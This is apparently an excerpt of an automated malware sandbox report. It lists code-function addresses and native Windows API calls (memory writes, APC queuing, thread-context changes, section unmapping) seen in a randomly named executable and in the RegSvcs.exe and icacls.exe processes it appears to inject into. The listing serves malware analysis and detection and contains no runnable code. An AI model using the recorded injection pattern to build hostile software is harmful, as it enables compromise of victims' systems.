Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2CF0 NtOpenProcess,	8_2_017F2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2CC0 NtQueryVirtualMemory,	8_2_017F2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2CA0 NtQueryInformationToken,	8_2_017F2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2F60 NtCreateProcessEx,	8_2_017F2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2F30 NtCreateSection,	8_2_017F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2FE0 NtCreateFile,	8_2_017F2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2FB0 NtResumeThread,	8_2_017F2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2FA0 NtQuerySection,	8_2_017F2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2F90 NtProtectVirtualMemory,	8_2_017F2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2E30 NtWriteVirtualMemory,	8_2_017F2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2EE0 NtQueueApcThread,	8_2_017F2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2EA0 NtAdjustPrivilegesToken,	8_2_017F2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2E80 NtReadVirtualMemory,	8_2_017F2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F3010 NtOpenDirectoryObject,	8_2_017F3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F3090 NtSetValueKey,	8_2_017F3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F39B0 NtGetContextThread,	8_2_017F39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F3D70 NtOpenThread,	8_2_017F3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F3D10 NtOpenProcessToken,	8_2_017F3D10
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF4340 NtSetContextThread,LdrInitializeThunk,	13_2_02EF4340
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF4650 NtSuspendThread,LdrInitializeThunk,	13_2_02EF4650
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2AF0 NtWriteFile,LdrInitializeThunk,	13_2_02EF2AF0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2AD0 NtReadFile,LdrInitializeThunk,	13_2_02EF2AD0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_02EF2BE0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_02EF2BF0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_02EF2BA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2B60 NtClose,LdrInitializeThunk,	13_2_02EF2B60
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_02EF2EE0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_02EF2E80
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2FE0 NtCreateFile,LdrInitializeThunk,	13_2_02EF2FE0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2FB0 NtResumeThread,LdrInitializeThunk,	13_2_02EF2FB0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2F30 NtCreateSection,LdrInitializeThunk,	13_2_02EF2F30
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_02EF2CA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2C60 NtCreateKey,LdrInitializeThunk,	13_2_02EF2C60
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_02EF2C70
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_02EF2DF0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2DD0 NtDelayExecution,LdrInitializeThunk,	13_2_02EF2DD0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_02EF2D30
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_02EF2D10
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF35C0 NtCreateMutant,LdrInitializeThunk,	13_2_02EF35C0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF39B0 NtGetContextThread,LdrInitializeThunk,	13_2_02EF39B0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2AB0 NtWaitForSingleObject,	13_2_02EF2AB0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2B80 NtQueryInformationFile,	13_2_02EF2B80
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2EA0 NtAdjustPrivilegesToken,	13_2_02EF2EA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2E30 NtWriteVirtualMemory,	13_2_02EF2E30
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2FA0 NtQuerySection,	13_2_02EF2FA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2F90 NtProtectVirtualMemory,	13_2_02EF2F90
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2F60 NtCreateProcessEx,	13_2_02EF2F60
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2CF0 NtOpenProcess,	13_2_02EF2CF0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2CC0 NtQueryVirtualMemory,	13_2_02EF2CC0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2C00 NtQueryInformationProcess,	13_2_02EF2C00
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2DB0 NtEnumerateKey,	13_2_02EF2DB0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF2D00 NtSetInformationFile,	13_2_02EF2D00
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF3090 NtSetValueKey,	13_2_02EF3090
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF3010 NtOpenDirectoryObject,	13_2_02EF3010
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF3D70 NtOpenThread,	13_2_02EF3D70
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF3D10 NtOpenProcessToken,	13_2_02EF3D10
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02719760 NtReadFile,	13_2_02719760
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_027195F0 NtCreateFile,	13_2_027195F0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02719A50 NtAllocateVirtualMemory,	13_2_02719A50
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02719850 NtDeleteFile,	13_2_02719850
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_027198F0 NtClose,	13_2_027198F0

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_04EBE12C	0_2_04EBE12C
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_0725F660	0_2_0725F660
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_0725FA8A	0_2_0725FA8A
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_0725FA98	0_2_0725FA98
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_07255928	0_2_07255928
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_07255917	0_2_07255917
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F7950	0_2_073F7950
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F0478	0_2_073F0478
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F0468	0_2_073F0468
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F1B20	0_2_073F1B20
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F0006	0_2_073F0006
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Code function: 0_2_073F0040	0_2_073F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00418AF3	8_2_00418AF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0042F0F3	8_2_0042F0F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402152	8_2_00402152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402160	8_2_00402160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC5	8_2_00402AC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AD0	8_2_00402AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00401AFD	8_2_00401AFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00401B00	8_2_00401B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004103FA	8_2_004103FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00410403	8_2_00410403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00416CEC	8_2_00416CEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00416D33	8_2_00416D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00410623	8_2_00410623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040E6A3	8_2_0040E6A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402F40	8_2_00402F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018801AA	8_2_018801AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018741A2	8_2_018741A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018781CC	8_2_018781CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0100	8_2_017B0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185A118	8_2_0185A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01848158	8_2_01848158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018803E6	8_2_018803E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE3F0	8_2_017CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187A352	8_2_0187A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018402C0	8_2_018402C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01880591	8_2_01880591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186E4F6	8_2_0186E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01864420	8_2_01864420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01872446	8_2_01872446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E4750	8_2_017E4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BC7C0	8_2_017BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DC6E0	8_2_017DC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D6962	8_2_017D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0188A9A6	8_2_0188A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C29A0	8_2_017C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CA840	8_2_017CA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C2840	8_2_017C2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE8F0	8_2_017EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A68B8	8_2_017A68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01876BD7	8_2_01876BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187AB40	8_2_0187AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BEA80	8_2_017BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CAD00	8_2_017CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185CD1F	8_2_0185CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BADE0	8_2_017BADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D8DBF	8_2_017D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860CB5	8_2_01860CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0C00	8_2_017C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0CF2	8_2_017B0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183EFA0	8_2_0183EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E0F30	8_2_017E0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01802F28	8_2_01802F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B2FC8	8_2_017B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01862F30	8_2_01862F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01834F40	8_2_01834F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187CE93	8_2_0187CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0E59	8_2_017C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187EEDB	8_2_0187EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187EE26	8_2_0187EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D2E90	8_2_017D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AF172	8_2_017AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F516C	8_2_017F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CB1B0	8_2_017CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0188B16B	8_2_0188B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186F0CC	8_2_0186F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187F0E0	8_2_0187F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018770E9	8_2_018770E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C70C0	8_2_017C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0180739A	8_2_0180739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AD34C	8_2_017AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187132D	8_2_0187132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018612ED	8_2_018612ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DD2F0	8_2_017DD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DB2C0	8_2_017DB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C52A0	8_2_017C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185D5B0	8_2_0185D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018895C3	8_2_018895C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01877571	8_2_01877571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B1460	8_2_017B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187F43F	8_2_0187F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187F7B0	8_2_0187F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018716CC	8_2_018716CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01805630	8_2_01805630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C9950	8_2_017C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DB950	8_2_017DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01855910	8_2_01855910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182D800	8_2_0182D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C38E0	8_2_017C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01835BF0	8_2_01835BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017FDBF9	8_2_017FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187FB76	8_2_0187FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DFB80	8_2_017DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01805AA0	8_2_01805AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01861AA3	8_2_01861AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185DAAC	8_2_0185DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186DAC6	8_2_0186DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01877A46	8_2_01877A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187FA49	8_2_0187FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01833A6C	8_2_01833A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C3D40	8_2_017C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DFDC0	8_2_017DFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01871D5A	8_2_01871D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01877D73	8_2_01877D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187FCF2	8_2_0187FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01839C32	8_2_01839C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187FFB1	8_2_0187FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187FF09	8_2_0187FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01783FD2	8_2_01783FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01783FD5	8_2_01783FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C1F92	8_2_017C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C9EB0	8_2_017C9EB0
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_02B2E12C	9_2_02B2E12C
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_052001E0	9_2_052001E0
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_05208340	9_2_05208340
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_0520B2CE	9_2_0520B2CE
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_05206D37	9_2_05206D37
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_05206D48	9_2_05206D48
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_052047A0	9_2_052047A0
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_05209138	9_2_05209138
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_0520C038	9_2_0520C038
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Code function: 9_2_0520E3B0	9_2_0520E3B0
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_0430017D	11_2_0430017D
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04320C14	11_2_04320C14
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04301F24	11_2_04301F24
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04301F1B	11_2_04301F1B
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_0430880D	11_2_0430880D
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04308854	11_2_04308854
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Code function: 11_2_04302144	11_2_04302144
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F402C0	13_2_02F402C0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F60274	13_2_02F60274
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ECE3F0	13_2_02ECE3F0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F803E6	13_2_02F803E6
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7A352	13_2_02F7A352
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F52000	13_2_02F52000
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F781CC	13_2_02F781CC
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F801AA	13_2_02F801AA
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F741A2	13_2_02F741A2
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F48158	13_2_02F48158
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EB0100	13_2_02EB0100
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F5A118	13_2_02F5A118
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDC6E0	13_2_02EDC6E0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EBC7C0	13_2_02EBC7C0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC0770	13_2_02EC0770
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EE4750	13_2_02EE4750
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F6E4F6	13_2_02F6E4F6
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F72446	13_2_02F72446
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F64420	13_2_02F64420
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F80591	13_2_02F80591
